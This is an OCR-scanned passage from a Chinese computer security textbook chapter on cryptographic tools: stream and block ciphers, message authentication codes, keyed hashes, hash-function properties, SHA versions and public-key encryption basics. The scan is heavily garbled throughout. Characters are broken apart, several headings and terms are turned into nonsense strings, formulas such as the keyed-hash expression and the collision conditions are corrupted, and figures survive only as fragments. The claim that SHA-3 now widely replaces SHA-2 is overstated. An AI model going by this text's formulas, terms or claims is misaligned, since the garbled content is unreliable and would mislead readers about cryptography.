用 其 结构 特征 来 破译 。 例 如 ， 若 这 段 消息 总 是 以 某 些 固定 的 字符 开头 ， 密 码 分 析 者 就 可 以 拥有 
大 量 的 明文 - 密 文 对 ， 进 而 展开 攻击 。 

为 了 增强 用 于 加 密 大 数据 序列 的 对 称 分 组 密码 的 安全 性 ， 出 现 了 大 量 可 选择 的 其 他 技术 ， 
称 为 操作 模式 (mode of operation)。 这 些 模式 克服 了 ECB 的 缺点 ， 每 个 模式 具有 自己 独 有 的 优 
势 。 这 个 话题 将 在 第 20 章 中 进行 讨论 。 ' 


2.1.3 HEW 


分 组 密码 〈block cipher) 一 次 处 理 输入 的 一 个 元 素 分 组 ， 每 个 输入 分 组 产生 一 个 输出 分 组 。 流 
密码 (stream cipher) 则 持续 地 处 理 输入 元 素 ， 每 次 产生 一 个 元 素 的 输出 ， 持 续 进 行 下 去 。 尽 管 分 组 
密码 已 非常 普遍 ， 但 是 某 些 基于 流 密码 的 应 用 也 是 很 受 欢迎 的 。 本 书 的 后 面 给 出 了 相关 的 例子 。 

一 个 典型 的 流 密 码 每 次 加 密 一 个 字 节 的 明文 ， 当 然 流 密码 也 可 被 设计 为 每 次 操作 一 位 或 者 
大 于 一 个 字 节 的 单元 。 图 2-2b 给 出 了 一 个 典型 的 流 密码 结构 图 。 在 该 结构 中 ， 密 钥 输 入 到 一 
个 伪 随 机 位 发 生 器 中 ， 该 伪 随 机 位 发 生 器 产生 一 串 随机 的 8 位 数 。 一 个 伪 随 机 流 就 是 在 不 知道 
输入 密 钥 的 情况 下 不 可 预知 的 流 ， 其 明显 具有 随机 特性 ( 见 2.5 节 )。 发 生 器 的 输出 称 为 密 钥 流 
(keystream)， 每 次 组 合成 一 个 字 节 ， 并 与 明文 流 进行 逐 位 异 或 (XOR) 运算 。 
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| 擅 随 机 字 节 发 生 器 

( 密 钥 流 发 生 器 ) 
密 文 字 
节 流 C 


b) 流 密码 加 密 
2-2 ”对 称 加 密 的 类 型 


通过 设计 合适 的 伪 随 机 数 发 生 器 ， 流 密码 可 以 提供 和 相应 密 钥 长 度 分 组 密码 相当 的 安全 
性 。 流 密码 相对 于 分 组 密码 来 说 其 主要 优点 是 ， 往 往 速度 更 快 而 且 编写 的 代码 更 少 。 分 组 密码 
的 优点 是 可 以 重复 使 用 密 钥 。 对 于 需要 对 数据 流 进 行 加 密 /解密 的 应 用 ， 比 如 在 一 个 数据 通信 
信道 上 或 者 浏览 器 /Web 连接 上 通信 ， 流 密码 就 是 很 好 的 解决 方案 。 而 对 于 处 理 成 块 数据 的 应 
用 ， 比 如 文件 传输 、 电 子 邮件 和 数据 库 ， 分 组 密码 则 更 为 适用 。 当 然 ， 在 实际 中 两 种 类 型 的 密 
码 都 可 用 于 各 种 应 用 。 


2.2 消息 认证 和 散 列 函数 


加 密 可 以 防止 被 动 攻 击 (窃听 )。 加 密 的 另 一 个 要 求 是 防止 主动 攻击 (数据 伪造 和 算 改 )。 
防止 这 些 攻 击 的 办 法 有 名 的 是 消息 认证 或 数据 认证 。 

当 消息 、 文 件 、 文 档 或 其 他 数据 集合 是 真实 的 且 来 自 于 合法 信 源 ， 则 被 称 为 是 可 信 的 。 消 
息 或 数据 认证 是 一 种 允许 通信 者 验证 所 接收 或 存储 的 数据 是 否 可 信 的 9 措施 。 认 证 包括 两 个 重 


O 为 简单 起 见 ， 在 本 节 剩 余部 分 ， 均 指 消息 认证 。 到 目前 为 止 ， 它 既 指 对 传输 的 消息 的 认证 ， 也 指 对 存储 的 
数据 的 认证 (数据 认证 )。 
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要 方面 : 验证 消息 的 内 容 有 没有 被 自 改 和 验证 信 源 是 否 可 和信。 还 可 以 验证 消息 的 时 效 性 ( 即 消 
息 没 有 被 人 为 地 延迟 和 重 放 ) 以 及 两 个 实体 之 间 传 输 的 消息 流 的 相对 顺序 。 所 有 这 些 问题 正如 
第 1 章 所 介绍 的 都 被 归 入 数据 的 完整 性 。 


2.2.1 利用 对 称 加 密实 现 认证 


仅仅 简单 地 使 用 对 称 加 密 也 可 以 进行 消息 认证 。 假 设 只 有 发 送 方 和 接收 方 共享 一 个 密 钥 
(这 是 合理 的 )， 那 么 只 有 真正 的 发 送 方才 能 够 成 功 地 为 对 方 加 密 消息 ， 提 供 接收 者 能 识别 的 有 
效 消息 。 此 外 ， 如 果 消 息 里 带 有 检 错 码 和 序号 ， 则 接收 方 就 可 以 确认 消息 是 否 被 修改 过 以 及 顺 
序 是 否 正确 。 如 果 消 息 还 包括 时 间 稚 ， 那 么 接收 方 就 可 以 确认 消息 的 传输 有 没有 超出 网 络 传输 
的 正常 延迟 。 

事实 上 ， 单 独 的 对 称 加 密 并 不 是 数据 认证 的 有 效 工 具 。 举 一 个 简单 的 例子 ， 在 ECB 加 密 
模式 下 ， 如 果 攻 击 者 重组 了 密 文 分 组 ， 那 么 每 个 分 组 仍然 能 成 功 地 被 解密 。 但 是 重组 可 能 改变 
了 整个 数据 序列 的 意义 。 尽 管 序 号 可 以 用 在 某 些 级 别 (如 每 个 人 P 包 ), 但 通常 不 会 为 每 个 b 位 
明文 分 组 关联 一 个 单独 的 序号 。 因 此 ， 分 组 重组 (block reordering) 成 了 一 个 潜在 的 威胁 。 


2.2.2 无须 加 密 的 消息 认证 


在 这 一 小 节 ， 我 们 研究 几 种 不 依赖 于 消息 加 密 的 消息 认证 技术 。 所 有 这 些 技术 都 会 生成 认 
证 标签 ， 并 且 附 加 在 每 一 条 消息 上 用 于 传输 。 消 息 本 身 并 不 会 被 加 密 ， 所 以 它 在 目的 地 是 可 读 
的 ， 而 且 与 目的 地 的 认证 功能 无 关 。 

由 于 这 里 讨论 的 技术 不 对 消息 加 密 ， 因 此 其 没有 提供 消息 的 机 密 性 。 消 息 加 密 本 身 没有 
提供 一 个 安全 的 认证 形式 。 但 是 通过 加 密 消 息 加 上 认证 标签 可 以 将 认证 和 机 密 性 组 合 在 一 个 
算法 中 。 然 而 ， 通 常情 况 下 ， 消 息 认 证 已 经 作为 一 个 独立 的 功能 从 消息 加 密 中 分 离 出 来 了 。 
[DAVI89] 中 给 出 了 三 种 采用 无 机 密 性 的 消息 认证 更 为 恰当 的 情形 。 

1. 有 许多 应 用 是 将 同一 消息 广播 到 很 多 目的 地 。 可 以 举 两 个 例子 ， 一 个 是 通知 各 用 户 网 络 
暂时 不 可 使 用 ， 另 一 个 是 控制 中 心 发 出 的 报警 信号 。 一 种 更 经 济 可 靠 的 方法 就 是 只 有 一 个 接收 
者 负责 验证 消息 的 真实 性 。 因 此 消息 必须 以 明文 加 上 消息 认证 标签 的 形式 进行 广播 。 负 责 验证 
的 系统 进行 认证 ， 如 果 发 生 错误 ， 它 就 发 出 警报 通知 其 他 接收 者 。 

2. 在 信息 交换 中 ， 可 能 有 这 样 一 种 情况 ， 即 通信 某 一 方 处 理 负 荷 较 大 ， 不 能 承担 解密 收 到 
的 所 有 消息 的 时 间 开 销 。 认 证 机 制 采用 选择 机 制 随机 地 选择 消息 进行 验证 。 

3. 对 明文 形式 的 计算 机 程序 进行 认证 是 一 种 很 吸引 人 的 服务 。 运 行 一 个 计算 机 程序 而 不 必 
每 次 对 其 解密 ， 因 为 每 次 对 其 解密 会 浪费 处 理 器 资源 。 但 是 ， 将 消息 认证 标签 附 于 该 程序 后 ， 
则 可 在 需要 保证 程序 完整 性 的 时 候 才 对 其 进行 检验 。 

因此 ， 在 满足 安全 要 求 方面 ， 认 证 和 加 密 都 有 其 适用 的 、 满 足 安全 要 求 的 场合 。 

消息 认证 码 一 种 认证 技术 是 利用 秘密 密 钥 来 生成 一 个 固定 长 度 的 短 数据 块 ， 称 之 为 消息 
认证 码 ， 并 将 该 数据 块 附加 在 消息 之 后 。 这 项 技术 假设 通信 双方 ， 比 如 A 和 B， 使 用 共同 的 
秘密 密 钥 Ka， 在 A 向 B 发送 消息 时 ， 则 A 计算 消息 认证 码 ， 它 是 一 个 关于 消息 和 密 钥 的 复 
杂 函 数 : MACu=F(Kis, M) 9。 消 息 和 认证 码 一 起 被 发 送 给 接收 方 。 接 收 方 对 收 到 的 消息 用 相 
同 的 秘密 密 钥 进行 相同 的 计算 得 出 新 的 消息 认证 码 ， 并 将 收 到 的 认证 码 和 计算 出 的 认证 码 进行 
比较 (参见 图 2-3 )。 我 们 假定 只 有 收发 双方 知道 该 秘密 密 钥 ， 那 么 如 果 接 收 到 的 认证 码 和 计算 
出 的 认证 码 相等 ， 则 有 


日 ”因为 消息 可 能 是 任意 长 度 的 ， 而 消息 认证 码 的 长 度 很 短 且 固 定 ， 所 以 理论 上 由 大 量 的 消息 中 一 定 会 产生 相 
同 的 MAC。 但 是 ,实际 中 很 难 找 到 具有 相同 MAC 的 消息 对 。 我 们 称 此 为 抗 碰撞 性 。 
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图 2-3 利用 消息 认证 码 (MAC) 进行 消息 认证 


1. 接收 方 可 以 相信 消息 未 被 修改 。 如 果 攻 击 者 改变 了 消息 ， 但 他 却 无 法 改变 相应 的 认证 
码 ， 所 以 接收 方 计算 出 的 认证 码 将 不 等 于 接收 到 的 认证 码 。 因 为 攻击 者 不 知道 秘密 密 钥 ， 所 以 
攻击 者 不 知道 应 该 如 何 改变 认证 码 才能 使 其 与 修改 后 的 消息 一 致 。 

2. 接收 方 可 以 相信 消息 来 自 真正 的 发 送 方 。 因 为 其 他 各 方 均 不 知道 秘密 密 钥 ， 因 此 他 们 不 
能 产生 具有 正确 认证 码 的 消息 。 

3. 如 果 消 息 中 含有 序号 (如 X.25、HDLC 和 TCP 中 使 用 的 序号 )， 那 么 接收 方 可 以 相信 消 
息 顺 序 是 正确 的 ， 因 为 攻击 者 无 法 成 功 地 修改 序号 。 

很 多 算法 都 可 以 用 来 生成 认证 码 。NIST 标准 、FIPS PUB 113 推荐 使 用 DES。DES 被 用 来 
产生 消息 的 加 密 密 文 ， 并 将 密 文 的 最 后 几 位 作为 认证 码 ， 通 常 是 16 位 或 者 32 位 的 9 。 

这 个 认证 过 程 很 像 是 加 密 过 程 ， 它 们 之 间 的 一 点 不 同 是 认证 算法 不 需要 是 可 逆 的 ， 而 解密 
必须 是 可 逆 的 。 已 经 证 实 由 于 认证 函数 的 数学 特性 ， 它 相对 于 加 密 来 说 更 不 易 被 破解 。 

单 向 散 列 函数 ” 单 向 散 列 函数 是 消息 认证 码 的 一 种 变形 。 与 消息 认证 码 一 样 ， 散 列 函数 接 
受 可 变 长 度 的 消息 M 作为 输入 ， 产 生 固定 长 度 的 消息 摘要 HM 作为 输出 (参见 图 2-4 )。 一 般 
地 ， 消 息 的 长 度 被 填充 到 某 个 固定 长 度 (如 1024 位 ) 的 整数 倍 ， 填 充 的 消息 包括 原始 消息 以 
位 为 单位 的 长 度 值 。 这 个 长 度 字段 作为 一 个 安全 措施 增加 了 攻击 者 利用 散 列 值 改变 消息 (产生 
具有 相同 散 列 函数 值 的 另 一 个 消息 ) 的 难度 。 

与 MAC 不 同 的 是 ， 散 列 函 数 不 能 使 用 秘密 密 钥 作 为 输入 ， 为 了 对 一 个 消息 进行 认证 ， 
可 信 的 消息 摘要 和 消息 一 起 被 发 送出 去 。 图 2-5 给 出 了 利用 散 列 值 对 消息 进行 认证 的 三 种 
方式 。 消 息 摘 要 ( 散 列 码 ) 可 以 利用 对 称 加密 (图 2-Sa)。 假 定 只 有 发 送 方 和 接收 方 共享 加 
密 密 钥 ， 那 么 可 信和 性 就 可 以 得 到 保证 。 消 息 摘要 也 可 以 利用 公 钥 加 密 (图 2-5b)。 这 将 在 
2.3 节 讨 论 。 利 用 公 钥 密码 加 密 有 两 个 优点 : 其 提供 了 数字 签名 和 消息 认证 ; 不 要 求 密 钥 分 
发 到 通信 各 方 。 


CO ”回想 我 们 在 2.1 节 讨 论 的 关于 大 量 数据 的 实际 安全 问题 ， 一 些 运 算 模式 需要 将 诸如 DES 之 类 的 分 组 密码 运 
用 到 长 度 大 于 一 个 分 组 的 数据 。 对 于 在 这 里 提 到 的 MAC 应 用 ，DES 采用 密码 分 组 链接 模式 (CBC)。 大 体 
E, DES 按 顺序 应 用 于 每 个 64 位 的 消息 分 组 ， 加 密 算 法 的 输入 是 当前 的 明文 分 组 和 以 前 的 密 文 分 组 的 异 或 
值 。MAC 来 源 于 最 终 的 分 组 加 密 。 见 第 20 章 关 于 CBC 的 讨论 。 
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Liù 


.消息 让 数据 分 组 MX (可 变 长 度 ) 








已 Z= 填 充 和 长 度 字 段 
图 2-4 安全 散 列 函数 的 框图 ; h=H(M) 





c) 利用 秘密 值 
图 2-5 利用 单 向 散 列 函数 进行 消息 认证 
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在 通信 量 较 小 的 情况 下 ， 这 两 种 方法 与 加 密 整 条 消息 相 比 更 具 优势 。 然 而 ， 人 们 越 来 越 对 
开发 完全 不 含 加 密 函 数 的 方法 感 兴趣 。[TSUD92] 中 给 出 了 几 种 不 希望 使 用 加 密 函数 的 理由 : 
e 加 密 软件 速度 慢 。 即 使 每 条 消息 需要 加 密 的 数据 量 不 大 ,但 也 总 有 消息 流 会 输入 到 系 
统 中 或 由 系统 输出 。 

e 加 密 硬件 成 本 不 容 忽 视 。 尽 管 已 有 实现 DES 的 低 成 本 芯片 ， 但 是 如 果 网 络 中 所 有 节点 
都 必须 有 该 硬件 ， 则 总 成 本 可 能 很 大 。 

© 加 密 硬件 是 针对 大 数据 量 进行 优化 的 。 对 于 小 的 数据 分 组 ， 花 费 在 初始 化 和 调用 上 的 
时 间 所 占 的 比例 很 大 。 

e 加 密 算法 可 能 受到 专利 保护 。 

图 2-5c 描述 了 利用 散 列 函数 但 不 使 用 加 密 的 消息 认证 技术 。 这 项 技术 被 称 为 带 密 钥 散 列 
MAC。 假 设 有 两 个 通信 实体 ， 如 A 和 B， 使 用 共同 的 秘密 密 钥 K。 这 个 秘密 密 钥 在 生成 散 列 
值 的 过 程 中 加 入 进来 。 图 2-5c 描述 了 这 种 方法 ， 当 A 有 消息 要 发 送 给 B 时 ， 他 首先 计算 以 秘 
密 密 钥 与 消息 的 连接 为 自 变量 的 散 列 函数 ， MDy=H(KI|M|K)°. EH [M|MDu] 发 送 给 B 
因为 B 拥有 密 钥 玉 ， 它 可 以 重新 计算 出 HKIIMIIK) 并 检验 MDw 的 值 。 因 为 秘密 密 钥 本 身 并 不 
被 发 送 ， 所 以 攻击 者 不 能 算 改 截获 的 信息 。 只 要 秘密 密 钥 是 安全 的 ， 那 么 攻击 者 就 不 可 能 生成 
伪 消 息 。 

需要 注意 的 是 ， 秘 密 密 钥 同 时 作为 消息 的 前 级 和 后 级 。 如 果 秘 密 密 钥 仅 作为 前 缀 或 仅 作为 
后 级 ， 那 么 这 种 机 制 的 安全 性 就 大 大 降低 了 。 这 个 话题 将 在 第 21 章 进行 讨论 。 第 21 章 还 描述 
了 一 种 称 为 HMAC 的 机 制 ， 这 种 机 制 比 图 2-5c 描述 的 方法 要 复杂 一 些 ， 并 已 成 为 带 密 钥 散 列 
MAC 的 标准 方法 。 


2.2.3 REMI BR 


单 向 散 列 函数 或 者 安全 散 列 函数 不 仅 在 消息 认证 中 而 且 在 数字 签名 中 都 是 很 重要 的 。 在 这 
一 小 节 ， 首 先 讨论 对 安全 散 列 函数 的 要 求 ， 然 后 讨论 具体 算法 。 

对 散 列 函 数 的 要 求 ” 散 列 函 数 的 目的 就 是 要 产生 文件 、 消 息 或 其 他 数据 块 的 “指纹 ”。 一 
个 散 列 函数 H 要 能 够 用 于 消息 认证 ， 它 必须 具有 下 列 性 质 : 

1. 石 可 应 用 于 任意 大 小 的 数据 块 。 

2. 巨 产生 固定 长 度 的 输出 。 

3. 对 任意 给 定 的 x， 计 算 H(x) 比较 容易 ， 用 硬件 和 软件 均 可 实现 。 

4. 对 任意 给 定 的 散 列 码 h， 找 到 满足 H(x)=h 的 x 在 计算 上 是 不 可 行 的 。 具有 这 种 性 质 的 
散 列 函数 被 称 为 是 单 向 (one-way) 的 或 抗原 象 (preimage resistant) 8 的 。 

5. 对 任意 给 定 的 分 组 x， 找 到 满足 yx 且 HOY) 二 HGx) 的 在 计算 上 是 不 可 行 的 , 具有 这 
种 性 质 的 散 列 函数 被 称 为 是 第 二 抗原 象 ( second preimage resistant) 的 , 有 时 也 被 称 为 是 弱 抗 碰 
撞 (weak collision resistant) 的 。 

6. 找到 任何 满足 A) = Hy) 的 偶 对 œ, 妨 在 计算 上 是 不 可 行 的 。 具 有 这 种 性 质 的 散 列 
函数 被 称 为 是 抗 碰 撞 (collision resistant) 的 。 有 时 也 被 称 为 是 强 抗 碰撞 ( strong collision 
resistant) 的 。 

前 三 个 性 质 是 散 列 函数 实际 应 用 于 消息 认证 中 所 必须 满足 的 。 

第 四 个 性 质 是 单 向 性 ， 即 由 消息 很 容易 计算 出 散 列 码 ,， 但 是 由 散 列 人 码 却 不 能 计算 出 相应 的 
消息 。 对 于 使 用 一 个 秘密 值 的 认证 方法 OLA 2-5c) 这 个 性 质 非常 重要 ， 虽然 该 秘密 值 本 身 并 不 


日 || RARER. 
© 对 于 /oo0=?>， 称 x* 为 ?的 原 象 ， 除 非 了 是 一 对 一 的 ， 否 则 对 于 给 定 的 》 将 有 多 个 原 象 值 。 
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传送 ， 但 若 散 列 函 数 不 是 单 向 的 ， 则 攻击 者 可 以 很 容易 地 找到 这 个 秘密 值 : 若 攻击 者 能 够 观 
察 或 者 截获 到 传送 的 消息 ， 则 他 可 以 得 到 消息 M 和 散 列 码 MDy=H(Sss\|M). RRR HBS 
PAA, MT Sus\|M=H-'(MDy), h FAE M 和 SallM， 所 以 可 得 出 S4g。 

第 五 条 性 质 可 以 保证 ， 不 能 找到 与 给 定 消息 具有 相同 散 列 值 的 另 一 个 消息 ， 因 此 它 可 以 在 
对 散 列 码 加 密 的 方法 中 防止 伪造 ( 见 图 2-5a 和 b)。 如 果 这 条 性 质 不 成 立 ， 那 么 攻击 者 可 以 先 
观察 或 截获 一 条 消息 及 其 加 密 的 散 列 码 ， 然 后 由 消息 产生 一 个 未 加 密 的 散 列 码 ， 最 后 产生 另 一 
个 具有 相同 散 列 码 的 消息 。 

一 个 散 列 函数 若 满足 上 面 所 列 出 的 前 五 条 性 质 则 称 其 为 弱 散 列 函 数 。 如 果 第 六 条 性 质 也 满 
足 ， 则 称 为 强 散 列 函 数 。 强 散 列 函数 能 阻止 一 个 实体 伪造 另 一 个 实体 已 经 签名 的 信息 。 例 如 ， 
假设 Bob 写 一 个 IOU 消息 ， 发 送 给 Alice，Alice 对 该 消息 进行 了 签名 。 如 果 Bob 发 现 两 个 消 
息 具 有 相同 的 散 列 值 ， 其 中 一 个 要 求 Alice 付 少量 的 钱 ， 另 一 个 要 求 她 付 大 量 的 钱 。Alice 签名 
了 第 一 条 信息 ， 那 么 Bob 就 认为 第 二 条 消息 也 是 可 信 的 。 

除了 提供 认证 功能 以 外 ， 消 息 摘要 还 能 提供 数据 完整 性 。 它 执行 与 帧 检验 序列 相同 的 功能 : 
如 果 消 息 中 的 某 些 位 在 传输 过 程 中 偶然 发 生 了 改变 ， 那 么 接收 到 的 消息 摘要 将 会 是 错误 的 。 

散 列 函数 的 安全 性 ”和 对 称 加 密 一 样 ， 对 安全 散 列 函数 的 攻击 也 有 两 类 : 密码 分 析 和 蛮 力 
攻击 。 和 对 称 加 密 算法 一 样 ， 散 列 函 数 的 密码 分 析 也 涉及 利用 该 算法 中 逻辑 上 的 弱点 。 

散 列 函数 抗 蛮 力 攻击 的 能 力 仅仅 依赖 于 算法 所 产生 的 散 列 码 的 长 度 。 对 于 长 度 为 的 散 列 
码 ， 所 需 的 代价 与 下 表 中 的 相应 量 成 正比 。 





如 果 要 求 抗 强 碰撞 能 力 (通常 期 望 安全 散 列 码 具 有 的 性 质 )， 那 么 值 2” 决定 了 该 散 列 码 
的 抗 蛮 力 攻击 的 强度 。Oorschot 和 Wiener[VANO94] 耗资 一 千 万 美元 ， 为 攻击 MDS 设计 了 一 
台 碰 撞 搜 索 器 ， 它 能 在 24 天 内 找到 一 个 碰撞 。MD5 使 用 的 是 128 位 的 散 列 码 ， 因 此 一 般 认 为 
128 位 散 列 码 是 不 够 的 。 如 果 将 散 列 码 看 作 是 以 32 位 为 单位 的 序列 ， 那 么 以 后 将 要 使 用 160 
位 散 列 码 。 对 160 位 的 散 列 码 ， 用 相同 的 搜索 机 则 需要 四 千年 才能 找到 一 个 碰撞 。 利 用 今天 的 
技术 可 能 需要 的 时 间 更 短 ， 因 此 160 位 已 经 是 不 可 信 的 了 。 

安全 散 列 函数 算法 ”在 最 近 几 年 里 ， 安 全 散 列 算法 (Secure Hash Algorithm, SHA) 已 成 为 
使 用 最 广泛 的 散 列 算法 。SHA 由 美国 标准 与 技术 研究 所 (NIST) 设计 并 于 1993 年 作为 联邦 信 
息 处 理 标准 (FIPS 180) 被 发 布 。 当 SHA 的 缺点 被 发 现 后 ， 修 订 版 于 1995 年 发 布 (FIPS 180- 
1 )， 通常 称 之 为 SHA-1。SHA-1 产生 160 位 的 散 列 值 。2002 Æ, NIST 提出 了 该 标准 的 修订 版 
(FIPS 180-2 )， 它 定义 了 三 种 新 的 SHA 版 本 ， 散 列 值 的 长 度 分 别 为 256 位 、384 位 和 512 位 ， 
分 别称 为 SHA-256、SHA-384 和 SHA-512。 这 些 新 的 版 本 统称 为 SHA-2， 它 们 与 SHA-1 具有 
相同 的 基本 结构 ， 并 使 用 了 相同 类 型 的 模 运算 和 逻辑 二 元 运算 。 特 别 是 512 位 的 SHA-2 版 本 ， 
似乎 具有 牢 不 可 破 的 安全 性 。 然 而 ， 鉴 于 SHA-2 与 SHA-1 两 者 结构 的 相似 性 ，NIST 决定 标准 
化 一 种 与 SHA-2 和 SHA-1 截然 不 同 的 新 的 散 列 函数 。 这 种 被 称 为 SHA-3 的 新 散 列 函数 发 布 于 
2012 年 ， 而 且 现在 已 经 作为 SHA-2 的 替代 品 而 被 广泛 运用 。 


2.2.4” 散 列 函数 的 其 他 应 用 


前 面 讨论 了 散 列 函数 在 消息 认证 和 创建 数字 签名 中 的 应 用 (本章 稍 后 将 对 后 者 进行 更 为 详 
细 的 讨论 )。 下 面 给 出 安全 散 列 函数 应 用 的 另外 两 个 例子 。 


40 BY HHEMKEERKSRE 


e OF: 第 3 章 介 绍 了 一 种 机 制 ， 即 操作 系统 中 存储 的 是 口令 的 散 列 值 而 不 是 口令 本 身 。 
因此 ， 能 访问 口令 文件 的 黑客 不 能 获得 有 效 的 口令 。 简 单 地 说 ， 当 用 户 输入 口令 时 ， 
口令 的 散 列 值 要 与 存储 在 系统 中 的 散 列 值 进行 匹配 。 这 个 应 用 要 求 抗原 象 性 ， 或 许 还 
要 求 第 二 抗原 象 性 。 

© ARMM: 在 一 个 系统 中 为 每 个 文件 存储 H(F) 并 保护 好 该 散 列 值 (例如 存储 在 一 个 受 
保护 的 CD-R 上 )。 你 可 以 通过 重新 计算 H(F) 来 确定 文件 是 否 被 修改 了 。 入 侵 者 可 能 
会 改变 F， 但 不 能 改变 H(F)。 这 个 应 用 要 求 弱 第 二 抗原 象 性 。 


2.3” 公 和 钥 加 密 
公 钥 加 密 与 对 称 加 密 同 等 重要 ， 它 应 用 于 消息 认证 和 密 钥 分 发 中 。 
2.3.1 公 钥 加 密 的 结构 


1976 Æ, Diffie 和 Hellman[DIFF76] 首次 提出 了 公 钥 加 密 的 思想 ， 这 是 有 文字 记载 的 几 千 
年 来 密码 领域 第 一 次 真正 革命 性 的 进步 。 公 钥 算 法 基于 数学 函数 ， 而 不 像 对 称 加 密 算法 那样 是 
基于 位 模式 的 简单 操作 。 更 重要 的 是 ， 公 钥 密 码 是 非 对 称 的 (asymmetric)， 它 使 用 两 个 单独 的 
密 钥 。 而 对 称 加 密 只 使 用 一 个 密 钥 。 使 用 两 个 密 钥 对 于 机 密 性 、 密 钥 分 发 和 认证 都 产生 了 意义 
深远 的 影响 。 

在 继续 进行 讨论 之 前 ， 我 们 首先 简单 解释 一 下 有 关公 钥 密 码 的 几 种 常见 误解 。 一 种 误解 
是 ， 从 密码 分 析 的 角度 看 ， 公 钥 密 码 比 对称 密 码 更 安全 。 而 事实 上 ， 任 何 加 密 方法 的 安全 性 都 
依赖 于 密 钥 的 长 度 和 破译 密码 所 需要 的 计算 量 。 从 抗 密码 分 析 的 角度 看 ， 原 则 上 不 能 说 对 称 密 
码 优 于 公 钥 密码 ， 也 不 能 说 公 钥 密码 优 于 对 称 密码 。 第 二 种 误解 是 公 钥 密码 是 一 种 通用 的 方 
法 ， 所 以 对 称 密码 已 经 过 时 了 。 其 实 正好 相反 ， 由 于 当前 的 公 钥 密码 所 需 的 计算 量 过 大 ， 因 而 
取缔 对 称 密 码 似乎 不 太 可 能 。 最 后 ， 有 一 种 误解 是 ， 对 称 密码 中 与 密 钥 分 发 中 心 的 握手 是 一 件 
异常 麻烦 的 事情 ， 与 之 相 比 ， 利 用 公 钥 密码 实现 密 钥 分 发 则 非常 简单 。 事 实 上 ， 使 用 公 钥 密码 
也 需要 某 种 形式 的 协议 ， 该 协议 通常 包含 一 个 中 心 代 理 ， 并 且 其 所 包含 的 处 理 过 程 既 不 比 对 称 

密码 需要 的 步骤 少 ， 也 不 更 有 效 。 

公 钥 密码 体制 有 6 个 组 成 部 分 (参见 图 2-6a): 

e HAX (plaintext): 算法 的 输入 ， 是 可 读 信息 或 数据 。 

e 加 密 算法 (encryption algorithm): 加 密 算法 对 明文 进行 各 种 变换 。 

e 公 钥 和 私 钥 (public and private key): 这 是 选 出 的 一 对 密 钥 ， 这 对 密 钥 中 一 个 用 于 加 密 ， 

另 一 个 用 于 解密 。 加 密 算法 执行 的 变换 依赖 于 公 钥 和 私 钥 9 。 
e ZX (ciphertext): 算法 的 输出 ， 其 依赖 于 明文 和 密 钥 。 对 于 给 定 的 消息 ， 不 同 的 密 钥 
产生 的 密 文 不 同 。 

© 解密 算法 (decryption algorithm); 该 算法 接收 密 文 和 相应 的 密 钥 ， 并 产生 原始 明文 。 

正如 其 字面 上 的 意思 ， 公 钥 对 其 他 使 用 者 来 说 是 公共 的 。 然 而 私 钥 只 有 它 的 拥有 者 知道 。 
一 般 的 公 钥 加 密 算法 依赖 于 一 个 加 密 密 钥 和 一 个 与 之 不 同 但 又 相关 的 解密 密 钥 。 

其 主要 步骤 如 下 : 

1. 每 个 用 户 产生 一 对 密 钥 ， 用 来 加 密 和 解密 消息 。 


”应 用 于 对 称 加 密 的 密 钥 一 般 被 称 为 秘密 密 钥 (secret key) 。 应 用 于 公 钥 加 密 的 两 个 密 钥 称 为 公 钥 (public key) 
FFL (private key)。 私 钥 依 然 需要 保持 其 秘密 性 ， 但 是 为 了 避免 与 对 称 加 密 混 淆 ， 而 被 称 为 私 钥 而 非 秘密 
密 钥 。 


B2F¢ FERREL 41 


2. 每 个 用 户 将 其 中 一 个 密 钥 放 在 公共 寄存 器 或 其 他 可 访问 的 文件 中 ， 该 密 钥 称 为 公 钥 ， 另 
一 个 密 钥 则 是 私有 的 。 如 图 2-6a 所 示 ， 每 个 用 户 可 以 拥有 若干 其 他 用 户 的 公 钥 。 

3. 若 Bob 要 发 送 消息 给 Alice， 则 Bob 用 Alice 的 公 钥 加 密 。 

4. Alice 收 到 消息 后 ， 用 其 私 钥 对 消息 解密 。 由 于 只 有 Alice 知道 其 自身 的 私 钥 ， 所 以 其 他 
的 接收 者 均 不 能 解密 出 消息 。 

利用 这 种 方法 ， 通 信 各 方 均 可 访问 公 钥 ， 而 私 钥 是 各 通信 方 在 本 地 产生 的 ， 所 以 不 必 进 
行 分 发 。 只 要 系统 控制 了 其 私 钥 ,那么 它 的 通信 就 是 安全 的 。 在 任何 时 刻 ， 系 统 可 以 改变 其 私 
钥 ， 并 公布 相应 的 公 钥 以 代替 原来 的 公 钥 。 

2-6b 描述 了 另 一 种 公 钥 加 密 的 运算 模式 。 在 这 种 机 制 中 ， 用 户 通过 他 的 私 钥 加 密 数据 。 
只 有 知道 相关 的 公 钥 的 人 才能 对 该 数据 进行 解密 。 












PR, | Alice 的 私 钥 


加 密 算 法 〈 如 RSA) 


Bob 
a) ABM 


PR, | Bob 的 私 钥 


YELPR, X] 


明文 输入 加 密 算法 (如 RSA) 


w m 


Bob 
b) 私 钥 加 密 
图 2-6 公 钥 密码 体制 
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请 注意 图 2-6a 所 描述 的 方案 ， 它 是 为 了 提供 机 密 性 : 只 有 期 望 的 接收 者 才能 对 密 文 进行 
解密 ， 因 为 只 有 期 望 的 接收 者 拥有 所 要 求 的 私 钥 。 事 实 上 机 密 性 依赖 于 许多 方面 的 因素 ， 包 括 
算法 的 安全 性 、 私 钥 的 保密 性 以 及 任何 包含 加 密 函 数 的 协议 的 安全 性 。 

图 2-6b 所 描述 的 方案 是 为 了 提供 认证 和 数据 完整 性 。 如 果 一 个 用 户 能 成 功 地 利用 Bob 的 
公 钥 将 Bob 的 密 文 还 原 为 明文 ， 这 表明 只 有 Bob 对 明文 进行 了 加 密 ， 以 此 提供 了 认证 。 更 进 
一 步 地 讲 ， 只 有 Bob 能 对 明文 进行 修改 ， 因 为 只 有 他 能 利用 自己 的 私 钥 对 明文 进行 加 密 。 需 
要 再 次 指出 的 是 ， 其 实际 提供 的 认证 或 数据 完整 性 依赖 于 多 种 因素 。 这 些 问 题 主 要 在 第 21 章 
进行 介绍 , 但 是 本 书 其 他 地 方 也 会 有 所 涉及 。 


23.2 ” 公 钥 密码 系统 的 应 用 

在 继续 进行 讨论 之 前 ， 我 们 首先 必须 澄清 公 钥 密码 系统 中 容易 引起 混淆 的 一 个 问题 。 公 
密码 体制 的 特点 是 使 用 具有 两 个 密 钥 的 密码 算法 ， 其 中 一 个 密 钥 是 私有 的 ， 另 一 个 是 公有 的 。 
